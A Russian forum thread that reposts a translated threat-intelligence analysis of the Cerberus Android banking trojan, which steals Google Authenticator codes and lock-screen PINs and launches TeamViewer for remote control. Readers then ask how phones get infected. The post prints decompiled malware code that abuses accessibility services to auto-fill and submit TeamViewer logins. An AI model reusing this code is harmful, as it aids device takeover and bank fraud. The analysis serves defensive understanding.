Социальные сети
Последние темы
» Российская Федерация. Доклад IDSC NEWWR
автор DoranPn Вс Мар 24 2024, 10:05

» Завещание Ричарда Граветта
автор Night Вс Мар 24 2024, 00:13

» Реальная ситуация в Украине
автор Night Вс Мар 24 2024, 00:08

» Глубинный народ
автор Night Вс Мар 24 2024, 00:04

» Telegram. Доклад IDSC NEWWR
автор WentFox Сб Мар 23 2024, 23:07

» Торговля данными
автор WentFox Сб Мар 23 2024, 22:39

» Свидетели "СВО"
автор Maxon4ik Сб Мар 23 2024, 21:40

» Неоднозначный Иран
автор Профессор Бухлов Сб Мар 23 2024, 21:22

» Юмор в картинках
автор Профессор Бухлов Сб Мар 23 2024, 20:18

» Че не на фронте пи@ор?
автор Профессор Бухлов Сб Мар 23 2024, 20:16

» Элита США и России пьют бензин и кровь вместе
автор КуражБомбей Сб Мар 23 2024, 19:15

» ЛДНР. Жертва не сделанного оборта
автор Night Сб Мар 23 2024, 17:17

» Лики тлена. Оппозиция в РФ
автор Argisht44 Сб Мар 23 2024, 15:08

» Плеяда идиотов!
автор Argisht44 Пт Мар 22 2024, 20:32

» Ядерная лож Запада, Китая и Путина. Власть дорвавшихся до СМИ идиотов
автор TragicDeath Пт Мар 22 2024, 13:37


Перехват разовых паролей из Google Authenticator. Банковский троян Cerberus

Участников: 4

Перейти вниз

Перехват разовых паролей из Google Authenticator. Банковский троян Cerberus Empty Перехват разовых паролей из Google Authenticator. Банковский троян Cerberus

Сообщение автор Admin Сб Фев 29 2020, 17:09

[Вы должны быть зарегистрированы и подключены, чтобы видеть это изображение]

Цербер


Банковский троян Cerberus, появившийся в конце июня 2019 года, произошел от печально известного трояна Anubis в качестве основного банковского вредоносного ПО. Несмотря на то, что в Cerberus по-прежнему отсутствовал набор функций, обеспечивающий успешную фильтрацию идентифицирующей личность информации (PII) с зараженных устройств, он по-прежнему не мог снизить порог обнаружения при злоупотреблении похищенной информацией и мошенничеством. В середине января 2020 года, после новогодних праздников, авторы Cerberus вернулись с новым вариантом, нацеленным на решение этой проблемы, функцией RAT для осуществления кражи с зараженного устройства.

Новая Мировая Религия не совсем понимает, почему было выбрано именно такое название, ведь Цербер это охранник дверей ада, а не вор, штурмовик или взломщик. Но это говорит лишь о то том, что специалисты в одном могут быть полными профанами во всех других областях из-за ограничения интеллектуальных возможностей. Либо это какой то сарказм.

Этот новый вариант Cerberus подвергся рефакторингу кодовой базы и обновлениям протокола связи C2, но, в частности, он был расширен за счет возможности RAT, возможности похищать учетные данные блокировки экрана устройства (PIN-код или образец свайпа) и токены 2FA из приложения Google Authenticator.

Служба RAT может просматривать файловую систему устройства и загружать его содержимое. Кроме того, она также может запускать TeamViewer и настраивать подключения к нему, предоставляя субъектам угроз полный удаленный доступ к устройству.

Когда TeamViewer работает, он предоставляет хакерам множество возможностей, включая изменение настроек устройства, установку или удаление приложений, но, прежде всего, использование любого приложения на устройстве (например, банковских приложений, мессенджеров и приложений социальных сетей). Это также может дать ценную информацию о поведении и привычках жертвы; на случай, если он будет использован в шпионских целях.

Следующий фрагмент кода показывает код, отвечающий за вход в систему TeamViewer и его инициализацию:

Код:
String runningPackage = this.lowerPkgName;
if(getNodeFromEvent.contains("com.teamviewer.host.market")) {
    AccessibilityNodeInfo username = AcccesibilityUtils.getNodeFromEvent(event, "com.teamviewer.host.market:id/host_assign_device_username");
    AccessibilityNodeInfo password = AcccesibilityUtils.getNodeFromEvent(event, "com.teamviewer.host.market:id/host_assign_device_password");
    AccessibilityNodeInfo submit = AcccesibilityUtils.getNodeFromEvent(event, "com.teamviewer.host.market:id/host_assign_device_submit_button");
    if(username != null) {
        this.teamviewerUsername = this.utils.readShPrStr(this, this.strings.connect_teamviewer);
        if(!this.teamviewerUsername.isEmpty()) {
            this.teamviewerPassord = this.utils.readShPrStr(this, this.strings.password);
            this.credsSubmitted = false;
            this.passwordFilled = false;
            this.userFilled = false;
            this.permissionStatus = 0;
            this.utils.writeShPrStr(this, this.strings.connect_teamviewer, "");
            this.utils.writeShPrStr(this, this.strings.password, "");
        }
    }

    if(this.permissionStatus == 0) {
        AccessibilityNodeInfo v7_7 = AcccesibilityUtils.getNodeFromEvent(event, "com.teamviewer.host.market:id/action_bar_root");
        if(v7_7 != null && AcccesibilityUtils.getNodeFromEvent(event, "com.teamviewer.host.market:id/buttonPanel") != null) {
            this.permissionStatus = 1;
            AccessibilityNodeInfo tmButton = AcccesibilityUtils.getNodeFromEvent(event, "android:id/button1");
            if(tmButton != null) {
                this.acc_utils.clickButton(tmButton);
            }

            AccessibilityNodeInfo klmCheckBox = AcccesibilityUtils.getNodeFromEvent(event, "com.samsung.klmsagent:id/checkBox1");
            AccessibilityNodeInfo klmConfirm = AcccesibilityUtils.getNodeFromEvent(event, "com.samsung.klmsagent:id/btn_confirm");
            if(klmCheckBox != null && this.permissionStatus == 1) {
                this.acc_utils.clickButton(klmCheckBox);
                this.acc_utils.clickButton(klmConfirm);
                this.permissionStatus = 2;
                Utils utils = this.utils;
                utils.launchPkg(this, "com.teamviewer.host.market");
            }
        }
    }

    if(!this.teamviewerUsername.isEmpty() && !this.teamviewerPassord.isEmpty()) {
        if(username != null && !this.userFilled) {
            this.acc_utils.setInput(username, this.teamviewerUsername);
            this.userFilled = true;
        }

        if(password != null && !this.passwordFilled) {
            this.acc_utils.setInput(password, this.teamviewerPassord);
            this.passwordFilled = true;
        }

        if((this.userFilled) && (this.passwordFilled) && !this.credsSubmitted) {
            this.permissionStatus = 0;
            this.acc_utils.clickButton(submit);
            this.credsSubmitted = true;
            String v0_9 = this.utils.readShPrStr(this, this.strings.hidden);
            if(v0_9.equals("true")) {
                this.goBack();
            }
        }
    }
}

Функция, обеспечивающая кражу учетных данных блокировки экрана устройства (PIN-код и шаблон блокировки), обеспечивается простым наложением, которое потребует от жертвы разблокировки устройства. Из реализации RAT мы можем сделать вывод, что эта кража учетных данных блокировки экрана была создана для того, чтобы хакеры могли удаленно разблокировать устройство для выполнения манипуляций, когда жертва не использует устройство. Это еще раз показывает креативность преступников для создания правильных инструментов для достижения успеха.

Злоупотребляя привилегиями доступа, троян может также украсть коды 2FA из приложения Google Authenticator. Когда приложение запущено, троян может получить содержимое интерфейса и отправить его на сервер C2. Еще раз, мы можем сделать вывод, что эта функциональность будет использоваться для обхода сервисов аутентификации, которые полагаются на коды OTP.

До конца февраля 2020 года, на подпольных форумах не было никакого обсуждения этих функций. Поэтому мы считаем, что этот вариант Цербера все еще находится на стадии тестирования, но может быть выпущен в ближайшее время. Имея исчерпывающий список целей, включая организации со всего мира, в сочетании с новой возможностью RAT, Cerberus является критическим риском для финансовых операций, предлагающих услуги онлайн-банкинга. Независимо от того, находится ли он в своем целевом списке или нет, его операторы могут легко расширить список для нацеливания на дополнительные приложения (см. текущий целевой список для этого и других вирусов).

Оригинал на ангийском языке на ThreatFabric


Последний раз редактировалось: Admin (Вс Сен 06 2020, 00:15), всего редактировалось 1 раз(а)
Admin
Admin
Admin
Admin

Сообщения : 2820
Unit token : 4286
Reputation : 642
Дата регистрации : 2019-08-01

https://newwr.actieforum.com

Вернуться к началу Перейти вниз

Перехват разовых паролей из Google Authenticator. Банковский троян Cerberus Empty Re: Перехват разовых паролей из Google Authenticator. Банковский троян Cerberus

Сообщение автор Argisht44 Сб Фев 29 2020, 20:34

Не, а как он попадает то на устройство? Надо же заразить сначала. Вот как они это делают? Если юзер не совсем осел, как ты его заразишь то?
Argisht44
Argisht44
Безумец
Безумец

Сообщения : 443
Unit token : 489
Reputation : 30
Дата регистрации : 2020-01-27
Возраст : 31
Откуда : Пермский край

Вернуться к началу Перейти вниз

Перехват разовых паролей из Google Authenticator. Банковский троян Cerberus Empty Re: Перехват разовых паролей из Google Authenticator. Банковский троян Cerberus

Сообщение автор DoranPn Вс Мар 01 2020, 22:50

Argisht44 пишет:Не, а как он попадает то на устройство? Надо же заразить сначала. Вот как они это делают? Если юзер не совсем осел, как ты его заразишь то?
Через почту наверно, аирдропы собирают, потом базы продают. Фишинг и прочее. Вряд ли они прям ломают кого то, это надо рядом быть.
DoranPn
DoranPn
Палач или Спаситель?
Палач или Спаситель?

Сообщения : 537
Unit token : 936
Reputation : 119
Дата регистрации : 2019-10-19
Возраст : 33
Откуда : Москва

Вернуться к началу Перейти вниз

Перехват разовых паролей из Google Authenticator. Банковский троян Cerberus Empty Re: Перехват разовых паролей из Google Authenticator. Банковский троян Cerberus

Сообщение автор Пилигрим Ср Мар 04 2020, 23:27

Вот это совсем плохо. Всегда на него так надеялся, на всех биржах установил. Теперь, если взломают, то все бабки разом смогут пожитить. Интересно, какой то ответ от Гуглов есть?
Пилигрим
Пилигрим

Сообщения : 14
Unit token : 14
Reputation : 0
Дата регистрации : 2020-03-04

Вернуться к началу Перейти вниз

Вернуться к началу

- Похожие темы

 
Права доступа к этому форуму:
Вы не можете отвечать на сообщения